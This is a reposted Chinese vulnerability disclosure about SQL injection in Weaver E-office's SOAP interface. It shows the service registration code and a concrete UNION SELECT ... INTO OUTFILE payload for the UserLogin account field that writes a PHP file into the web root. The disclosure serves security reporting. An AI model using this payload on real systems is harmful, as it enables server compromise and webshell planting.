"xsd:string" ), "smsType" => array( "name" => "smsType", "type" => "xsd:string" ), "attachmentID" => array( "name" => "attachmentID", "type" => "xsd:string" ), "attachmentName" => array( "name" => "attachmentName", "type" => "xsd:string" ), "typeText" => array( "name" => "typeText", "type" => "xsd:string" ), "typeUrl" => array( "name" => "typeUrl", "type" => "xsd:string" ), "smsTypeName" => array( "name" => "smsTypeName", "type" => "xsd:string" ) ) );  $server->register( "GetMessage", array( "userID" => "xsd:string", "isOnlyNew" => "xsd:boolean" ), array( "return" => "tns:messageReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetMessage", "rpc", "encoded", "GetMessage" );  $server->register( "SetMessageRead", array( "userID" => "xsd:string", "messageIDStr" => "xsd:string", "fromUserID" => "xsd:string" ), array( ), "urn:EofficeService", "urn:EofficeService#SetMessageRead", "rpc", "encoded", "SetMessageRead" );  $server->register( "CreateFile", array( "subject" => "xsd:string", "attachmentIDStr" => "xsd:string", "attachmentNameStr" => "xsd:string", "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CreateFile", "rpc", "encoded", "CreateFile" );  $server->wsdl->addComplexType( "newVersionReturnArray", "complexType", "struct", "all", "", array( "version" => array( "name" => "version", "type" => "xsd:string" ), "readme" => array( "name" => "readme", "type" => "tns:newVersionReadmeArray" ) ) );  $server->wsdl->addComplexType( "newVersionReadmeArray", "complexType", "array", "", "SOAP-ENC:Array", array( ), array( array( "ref" => "SOAP-ENC:arrayType", "wsdl:arrayType" => "tns:newVersionReadme[]" ) ), "tns:newVersionReadme" );  $server->wsdl->addComplexType( "newVersionReadme", "complexType", "struct", "all", "", array( "subject" => array( "name" => "subject", "type" => "xsd:string" ), "describe" => array( "name" => "describe", "type" => "xsd:string" ), "image" => array( "name" => "image", "type" => "xsd:string" ) ) );  $server->register( "GetNewVersion", array( ), array( "return" => "tns:newVersionReturnArray" ), "urn:EofficeService", "urn:EofficeService#GetNewVersion", "rpc", "encoded", "GetNewVersion" );  $server->register( "Attend", array( "userID" => "xsd:string", "deptID" => "xsd:string", "privID" => "xsd:string", "checkType" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#Attend", "rpc", "encoded", "Attend" );  $server->register( "CheckIsSignIn", array( "userID" => "xsd:string" ), array( "return" => "xsd:string" ), "urn:EofficeService", "urn:EofficeService#CheckIsSignIn", "rpc", "encoded", "CheckIsSignIn" );  $server->service( $HTTP_RAW_POST_DATA );  ?>



2.传递参数HTTP_RAW_POST_DATA 这个不走gpc




泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)



泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)


泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)


先看UserLogin 这个借口:

里面的 userAccount 为

admin' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,10,1,2,3,4,5,6,7,8,9,10,1,'wooyun' into outfile 'D:/eoffice/webroot/attachment/wooyun.php'#

泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)



泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

下来看看 第二种sql注射:


泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)


泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)

ok 统计一下有10处,案例不多举例子了





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  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
  • 本文由 发表于 2020年1月1日03:51:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微E-office 同一文件多处sql注射/用户信息泄露(ROOT SHELL)https://cn-sec.com/archives/76554.html


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